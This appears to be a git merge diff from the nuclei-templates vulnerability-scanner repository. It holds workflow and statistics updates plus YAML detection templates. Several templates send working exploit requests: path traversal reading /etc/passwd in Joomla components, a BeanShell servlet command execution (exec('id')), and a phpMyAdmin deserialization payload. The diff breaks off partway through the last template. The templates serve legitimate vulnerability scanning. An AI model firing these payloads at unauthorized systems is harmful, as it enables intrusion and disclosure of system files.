Merge branch 'projectdiscovery:master' into master
commit
961dad4098
|
@ -0,0 +1,46 @@
|
||||||
|
name: ✍🏻 CVE Annotate
|
||||||
|
|
||||||
|
on:
|
||||||
|
push:
|
||||||
|
branches:
|
||||||
|
- master
|
||||||
|
workflow_dispatch:
|
||||||
|
|
||||||
|
jobs:
|
||||||
|
docs:
|
||||||
|
runs-on: ubuntu-latest
|
||||||
|
steps:
|
||||||
|
- uses: actions/checkout@master
|
||||||
|
with:
|
||||||
|
persist-credentials: false
|
||||||
|
fetch-depth: 0
|
||||||
|
token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
|
||||||
|
- uses: actions/setup-go@v2
|
||||||
|
with:
|
||||||
|
go-version: 1.17
|
||||||
|
|
||||||
|
- name: Generate CVE Annotations
|
||||||
|
id: cve-annotate
|
||||||
|
run: |
|
||||||
|
if ! which cve-annotate > /dev/null; then
|
||||||
|
echo -e "Command cve-annotate not found! Installing\c"
|
||||||
|
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
|
||||||
|
fi
|
||||||
|
cve-annotate -i ./cves/ -d .
|
||||||
|
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||||
|
|
||||||
|
- name: Commit files
|
||||||
|
if: steps.cve-annotate.outputs.changes > 0
|
||||||
|
run: |
|
||||||
|
git config --local user.email "action@github.com"
|
||||||
|
git config --local user.name "GitHub Action"
|
||||||
|
git add cves
|
||||||
|
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
|
||||||
|
|
||||||
|
- name: Push changes
|
||||||
|
if: steps.cve-annotate.outputs.changes > 0
|
||||||
|
uses: ad-m/github-push-action@master
|
||||||
|
with:
|
||||||
|
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||||
|
branch: ${{ github.ref }}
|
|
@ -6,13 +6,10 @@ jobs:
|
||||||
build:
|
build:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout Repo
|
- uses: actions/checkout@master
|
||||||
uses: actions/checkout@master
|
- uses: actions/setup-go@v2
|
||||||
|
|
||||||
- name: Setup golang
|
|
||||||
uses: actions/setup-go@v2
|
|
||||||
with:
|
with:
|
||||||
go-version: 1.14
|
go-version: 1.17
|
||||||
|
|
||||||
#- name: Cache Go
|
#- name: Cache Go
|
||||||
# id: cache-go
|
# id: cache-go
|
||||||
|
@ -26,11 +23,11 @@ jobs:
|
||||||
env:
|
env:
|
||||||
GO111MODULE: on
|
GO111MODULE: on
|
||||||
run: |
|
run: |
|
||||||
go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei
|
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@master
|
||||||
shell: bash
|
shell: bash
|
||||||
|
|
||||||
- name: Template Validation
|
- name: Template Validation
|
||||||
run: |
|
run: |
|
||||||
nuclei -validate -t . -exclude .pre-commit-config.yaml
|
nuclei -validate -t .
|
||||||
nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml
|
nuclei -validate -w ./workflows
|
||||||
shell: bash
|
shell: bash
|
|
@ -11,21 +11,14 @@ jobs:
|
||||||
runs-on: ubuntu-latest
|
runs-on: ubuntu-latest
|
||||||
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
|
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
|
||||||
steps:
|
steps:
|
||||||
- name: Checkout Repo
|
- uses: actions/checkout@master
|
||||||
uses: actions/checkout@master
|
- uses: actions/setup-go@v2
|
||||||
with:
|
with:
|
||||||
fetch-depth: 0
|
go-version: 1.17
|
||||||
|
|
||||||
- name: Setup golang
|
|
||||||
uses: actions/setup-go@v2
|
|
||||||
with:
|
|
||||||
go-version: 1.14
|
|
||||||
|
|
||||||
- name: Installing Template Stats
|
- name: Installing Template Stats
|
||||||
env:
|
|
||||||
GO111MODULE: on
|
|
||||||
run: |
|
run: |
|
||||||
go get -v github.com/projectdiscovery/templates-stats@main
|
go install github.com/projectdiscovery/templates-stats@main
|
||||||
shell: bash
|
shell: bash
|
||||||
|
|
||||||
- name: Markdown Stats
|
- name: Markdown Stats
|
||||||
|
|
|
@ -2,7 +2,7 @@
|
||||||
extends: default
|
extends: default
|
||||||
|
|
||||||
ignore: |
|
ignore: |
|
||||||
.pre-commit-config.yaml
|
.pre-commit-config.yml
|
||||||
.github/workflows/*.yml
|
.github/workflows/*.yml
|
||||||
|
|
||||||
rules:
|
rules:
|
||||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
||||||
|
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
|
| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 |
|
||||||
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
|
| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 |
|
||||||
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
|
| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 |
|
||||||
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
|
| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 |
|
||||||
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
|
| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | |
|
||||||
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | |
|
||||||
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
|
| rce | 195 | gy741 | 72 | takeovers | 63 | | | | |
|
||||||
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
|
| tech | 169 | madrobot | 62 | default-logins | 56 | | | | |
|
||||||
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
|
| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | |
|
||||||
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
|
| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | |
|
||||||
|
|
||||||
**147 directories, 1989 files**.
|
**164 directories, 2063 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
File diff suppressed because one or more lines are too long
1540
TEMPLATES-STATS.md
1540
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||||
| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 |
|
| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 |
|
||||||
| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 |
|
| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 |
|
||||||
| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 |
|
| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 |
|
||||||
| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 |
|
| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 |
|
||||||
| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | |
|
| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | |
|
||||||
| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | |
|
| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | |
|
||||||
| rce | 190 | gy741 | 72 | takeovers | 71 | | | | |
|
| rce | 195 | gy741 | 72 | takeovers | 63 | | | | |
|
||||||
| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | |
|
| tech | 169 | madrobot | 62 | default-logins | 56 | | | | |
|
||||||
| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | |
|
| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | |
|
||||||
| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | |
|
| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | |
|
||||||
|
|
|
@ -12,24 +12,17 @@ requests:
|
||||||
- |
|
- |
|
||||||
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
|
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
||||||
Content-Length: 5
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Accept-Encoding: deflate
|
|
||||||
|
|
||||||
"1":1
|
"1":1
|
||||||
- |
|
- |
|
||||||
GET /public/index.php/home/file/user_pics HTTP/1.1
|
GET /public/index.php/home/file/user_pics HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
||||||
Accept-Encoding: gzip
|
|
||||||
Accept-Encoding: deflate
|
|
||||||
|
|
||||||
- |
|
- |
|
||||||
GET {{endpoint}} HTTP/1.1
|
GET {{endpoint}} HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
|
|
||||||
Accept-Encoding: deflate
|
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
- type: regex
|
- type: regex
|
||||||
|
|
|
@ -12,7 +12,6 @@ requests:
|
||||||
- |
|
- |
|
||||||
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
|
|
@ -14,7 +14,6 @@ requests:
|
||||||
- | #linux
|
- | #linux
|
||||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
bsh.script=exec("id");
|
bsh.script=exec("id");
|
||||||
|
@ -22,7 +21,6 @@ requests:
|
||||||
- | #windows
|
- | #windows
|
||||||
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
bsh.script=exec("ipconfig");
|
bsh.script=exec("ipconfig");
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
|
name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability
|
||||||
author: princechaddha
|
author: princechaddha
|
||||||
severity: high
|
severity: high
|
||||||
description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
||||||
reference:
|
reference:
|
||||||
- https://www.phpmyadmin.net/security/PMASA-2009-3/
|
- https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||||||
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||||||
|
@ -17,11 +17,7 @@ requests:
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
Accept: */*
|
Accept: */*
|
||||||
Accept-Language: en
|
|
||||||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
|
||||||
Connection: close
|
|
||||||
Content-Type: application/x-www-form-urlencoded
|
Content-Type: application/x-www-form-urlencoded
|
||||||
Content-Length: 80
|
|
||||||
|
|
||||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||||
|
|
||||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2009-4223
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: KR-Web <= 1.1b2 RFI
|
name: KR-Web <= 1.1b2 RFI
|
||||||
description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents.
|
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
|
||||||
reference:
|
reference:
|
||||||
- https://sourceforge.net/projects/krw/
|
- https://sourceforge.net/projects/krw/
|
||||||
- https://www.exploit-db.com/exploits/10216
|
- https://www.exploit-db.com/exploits/10216
|
||||||
|
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1307
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Magic Updater - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Magic Updater (com_joomlaupdater) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12070
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1307
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1308
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component SVMap 1.1.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the SVMap (com_svmap) component 1.1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12066
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1308
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1312
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component News Portal 1.5.x - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12077
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1312
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1352
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Juke Box 1.7 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12084
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1352
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1472
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12167
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1472
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1473
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Advertising 0.25 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12171
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1473
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1476
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12150
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1476
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1531
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component redSHOP 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12054
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1531
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1534
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component Shoutbox Pro - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12067
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1534
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1607
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component WMI 1.5.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12316
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1607
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1719
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the MT Fire Eagle (com_mtfireeagle) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12233
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1719
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1723
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12289
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1723
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1952
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Joomla! Component BeeHeard 1.0 - Local File Inclusion
|
||||||
|
author: daffainfo
|
||||||
|
severity: high
|
||||||
|
description: Directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||||
|
reference:
|
||||||
|
- https://www.exploit-db.com/exploits/12239
|
||||||
|
- https://www.cvedetails.com/cve/CVE-2010-1952
|
||||||
|
tags: cve,cve2010,joomla,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: CVE-2010-1956
|
||||||
|
|
||||||
|
info:
|
||||||
|
